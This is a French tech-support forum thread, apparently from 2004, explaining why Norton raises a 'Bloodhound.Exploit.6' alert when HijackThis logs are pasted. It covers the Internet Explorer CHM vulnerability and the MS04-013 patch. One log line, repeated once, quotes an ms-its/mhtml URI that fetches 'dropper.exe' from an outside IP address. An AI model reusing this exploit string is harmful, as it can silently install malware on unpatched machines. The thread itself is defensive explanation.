Bloodhound exploit 6
Résolu
Halala
Messages postés
959
Statut
Membre
-
Halala Messages postés 959 Statut Membre -
Halala Messages postés 959 Statut Membre -
B'jour tout le monde. Ce matin, en allant sur www .hijackthis.de/index.php , j'ai vu passer bloodhound exploit 6...
Et ceci en analysant par curiosité ce log: http://www.commentcamarche.net/forum/affich-1477284-Purifier-mon-PC-avec-Hijackthis
Source : C:\Temporary Internet Files\Content.IE5\OHMZC1YV\index[1].htm
Des courageux pour confirmer ? ?...;-)
Et ceci en analysant par curiosité ce log: http://www.commentcamarche.net/forum/affich-1477284-Purifier-mon-PC-avec-Hijackthis
Source : C:\Temporary Internet Files\Content.IE5\OHMZC1YV\index[1].htm
Des courageux pour confirmer ? ?...;-)
A voir également:
- Bloodhound exploit 6
- Nero 6 - Télécharger - Gravure
- Gta 6 trailer 2 - Guide
- Paris multiple 2/6 explication ✓ - Forum Loisirs / Divertissements
- 6 ampere = watt - Forum Logiciels
- Livre catégorie 6 signification ✓ - Forum Loisirs / Divertissements
2 réponses
salut halala
Il m'est arrivé il ya quelques temps la meme chose.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(et maintenant coolwebsearch) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé, page web ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si windows est à jours et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV (detection heuristique) qui fait son boulot.
a+
Il m'est arrivé il ya quelques temps la meme chose.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(et maintenant coolwebsearch) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé, page web ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si windows est à jours et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV (detection heuristique) qui fait son boulot.
a+
Halala...çà l'fait pas...mais çà va l'faire...